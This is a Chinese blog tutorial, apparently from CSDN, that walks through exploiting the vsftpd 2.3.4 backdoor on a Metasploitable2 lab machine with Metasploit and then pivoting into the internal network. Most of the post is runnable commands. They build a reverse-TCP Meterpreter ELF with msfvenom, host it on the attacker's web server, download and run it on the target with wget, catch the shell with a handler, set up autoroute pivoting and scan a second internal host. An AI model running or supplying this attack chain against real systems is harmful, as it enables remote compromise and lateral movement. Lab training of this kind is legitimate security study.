渗透之——Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网

最新推荐文章于 2024-03-15 17:27:43 发布
最新推荐文章于 2024-03-15 17:27:43 发布
阅读量5.9k 收藏 20
点赞数 2
分类专栏: 精通渗透系列 文章标签: 渗透 Metasploit VSFTPD2.3.4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1028386804/article/details/86357202
版权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86357202

攻击机:Kali 192.168.109.137

靶机:Metasploitable2 192.168.109.140

内网另一主机: Metasploitable2 192.168.109.159

工具:Metasploit

1.开启MSF

msfconsole

2.扫描指定主机的服务和端口

nmap -sV -p 21,22,25,80,110,443,445 192.168.109.140

如果要存入MSF的数据库,则:

db_nmap -sV -p 21,22,25,80,110,443,445 192.168.109.140

3.列出在目标端口上运行的服务

services

4.过滤服务,只显示开启的服务

services -u

5.列出数据库中所有的主机

hosts

6.漏洞攻击

use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.109.140
set RPORT 21
show payloads
set payload cmd/unix/interact
exploit

注:所有操作都是在MSF终端下

这里,我们继续将Shell控制升级为Meterpreter命令行。

在攻击机Kali上重新开启一个终端:

7.生成反弹木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.109.137 LPORT 4444 -f elf > backdoor.elf

注:elf是Linux系统下的默认扩展名

8.启动Kali上的Apache服务,并将backdoor.elf放置到服务器中

service apache2 start
mv backdoor.elf /var/www/html/

这样,就可以让目标系统从我们的计算机中下载这个木马文件了。

9.在目标机上下载木马文件

切换到第6步的终端,执行命令:

wget http://192.168.109.137/backdoor.elf

即将木马文件下载到了目标机上

10.在新开启的终端上执行如下命令

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.109.137
set LPORT 4444
exploit

11.在目标机上运行木马文件

切换到第6步的终端,执行命令:

chmod 7777 backdoor.elf
./backdoor.elf

12.查看反弹的Meterpreter终端

回到新开启的终端上查看,此时,我们看到已经反弹回Meterpreter命令行了。

接下来,就可以在Meterpreter终端进行操作了。

下面,我们渗透内部网络。

13. 查看ARP内容

arp

由输出可以看出,内网中有另一主机IP地址为:192.168.109.159

为了渗透进入这个内部网络,需要在成功渗透的主机上使用autoroute命令来设置跳板。

14.设置跳板

在Meterpreter终端执行:

run autoroute -p
run autoroute -s 192.168.109.0 255.255.255.0
run autoroute -p

此时,我们的MSF就可以通过这个Meterpreter会话连接到内部网络。

15.将Meterpreter会话切换到后台

background

接下来就对这个网络中IP地址为192.168.109.159的主机使用auxiliary/scanner/portscan/tcp辅助模块进行一次端口扫描

16.对内网主机192.168.109.159进行端口扫描

use auxiliary/scanner/portscan/tcp
show options
setg RHOSTS 192.168.109.159
run

注意:设置RHOSTS的值时,这里使用的是setg命令,这样就会使RHOSTS的值设置为全局的192.168.109.159,从而无需反复输入这个命令。

由输出可知,在192.168.109.159上运行着很多服务,而且80端口是开放的。接下来使用auxiliary/scanner/http/http_version来验证目标主机在80端口上运行的服务。

17.验证192.168.109.159 80端口运行的服务

use auxiliary/scanner/http/http_version
show options
set RHOSTS 192.168.109.159
run

由输出可知,在主机80端口上运行的是Apache2.2.8服务器,其中的PHP 5.2.4版本是存在漏洞的,可以被攻击者获取对目标系统的控制。

 

冰 河
关注
  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vsftpd 2.3.4 带漏洞版本 可复现
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可复现
漏洞复现-vsftpd-v2.3.4
weixin_33682790的博客
08-07 571
本文作者:i春秋签约作家——屌丝绅士vsftpd-2.3.4早期版本存在恶意的后门,在钟馗之眼上目前骇客以收到如此的主机,不过很多的服务器都已经被修复过,但总有漏网之鱼,有兴趣的小伙伴不妨去试试 0×01前言: vsftpd-2.3.4早期版本存在恶意的后门,在钟馗之眼上目前骇客以收到如此的主机,不过很多的服务器都已经被修复过,但总...
网络安全漏洞扫描:十二大类型及十个关键步骤解析
最新发布
A1_3_9_7的博客
03-15 944
漏洞(风险)扫描是保障现代企业数字化转型安全开展过程一个至关重要的组成部分,可以帮助企业识别数字化系统和应用的各类安全缺陷。在实际应用时,漏洞扫描的类型需要和它们能够保护的IT环境保持一致。如果充分了解不同类型漏洞扫描技术之间的区别,企业可以提高整体网络安全防御能力,并加固系统以防范潜在威胁。本文收集整理了目前最常见的12种漏洞扫描类型(见下表),并对每种扫描的主要应用特点和典型适用场景进行了分析介绍。
VSFTPD2.3.4笑脸漏洞复现
weixin_53156886的博客
12-13 3139
笑脸漏洞:该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 攻击机:kali Linux 靶机:Metaspolitable2 kali和靶机以NAT模式连接 得到自己的IP :192.168.152.128 nmap扫描主机IP下的端口 扫描到192.168.152.129开放了21等端口 扫描该IP开启的...
Vsftpd2.3.4-端口渗透 6200 irc_3281_backdoor
旺仔Sec&blog
07-24 298
Vsftpd2.3.4-笑脸注入
metasploit使用lnk漏洞渗透测试.doc
03-18
metasploit使用lnk漏洞渗透测试.doc
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
渗透测试之Metasploit
06-16
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
用于渗透测试、漏洞开发和漏洞恢复的Metasploit工具包
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf ...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击
Linux 源代码 编译安装vsftpd-2.3.4
03-19
Linux 源代码 编译安装vsftpd-2.3.4,提供开源安全可靠的ftp服务系统,是你搭载ftp的不二之选
vsftp2.3.4安装.rar
03-20
vsftpd2.3.4主要用途就是因为他有一个人尽皆知的漏洞,笑脸漏洞vsftpd2.3.4,本工具里有自动安装脚本,可以方便快捷的执行安装操作,省去了很多时间,感兴趣的小伙伴可以进行下载。
vsftpd 2.3.4
12-15
Linux 源代码 编译安装vsftpd-2.3.4 提供开源安全可靠的ftp服务系统 文件夹内有详细教程与配套文件 Linux 源代码 编译安装vsftpd-2.3.4的配置 Linux下FTP服务器vsftp配置大全超完整版 Linux下vsFTP配置全方案(限制用户端口速度空间)
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文包含了命令和步骤,很详细,给初学者作为参考。
Linux 源代码 安装vsftpd 2.3.4
涂作权的博客
06-05 8832
Linux 源代码 安装vsftpd 2.3.4   2011-10-22 12:15:40|  分类: Unix/Linux 笔记 |  标签:linux  vsftpd  |举报|字号 订阅 wget ftp://vsftpd.beasts.org/users/cevans/vsftpd-2.3.4.tar.g
vsftpd-2.3.4服务器在ok6410开发板上的移植
alan00000的专栏
01-11 6572
老房原创修改版,在房老师教程基础上修改而成。   老房原创,转载声明,熬夜至凌晨2点捣鼓不容易啊! 我的环境飞凌OK6410开发板,arm-linux-gcc 4.3.2(我一般用的开发工具不新不旧) --------------------------------------传-说--的-分-割-线--------------------------------------------
编译安装vsftpd-2.3.4(配置虚拟用户登录)高级应用全攻略[连载之电子商务系统架构]...
weixin_34268753的博客
10-11 363
编译安装vsftpd-2.3.4(配置虚拟用户登录)高级应用全攻略[连载之电子商务系统架构] 原文出处:http://jimmyli.blog.51cto.com/ Jimmy Li Blog 作者:Jimmy Li 联系讨论、扣扣:柒⑥柒陆叁⑤叁伍 关联博文:http://jimmyli.blog.51cto.com/3190309/683599 centos5...
metasploit渗透攻击:后门
06-02
Metasploit是一款流行的渗透测试工具,可用于发现系统漏洞攻击目标系统并获取系统权限。后门是一种常见的攻击手段,它可让黑客在未来再次访问受害者系统而不被发现。使用Metasploit创建后门非常简单,只需要执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值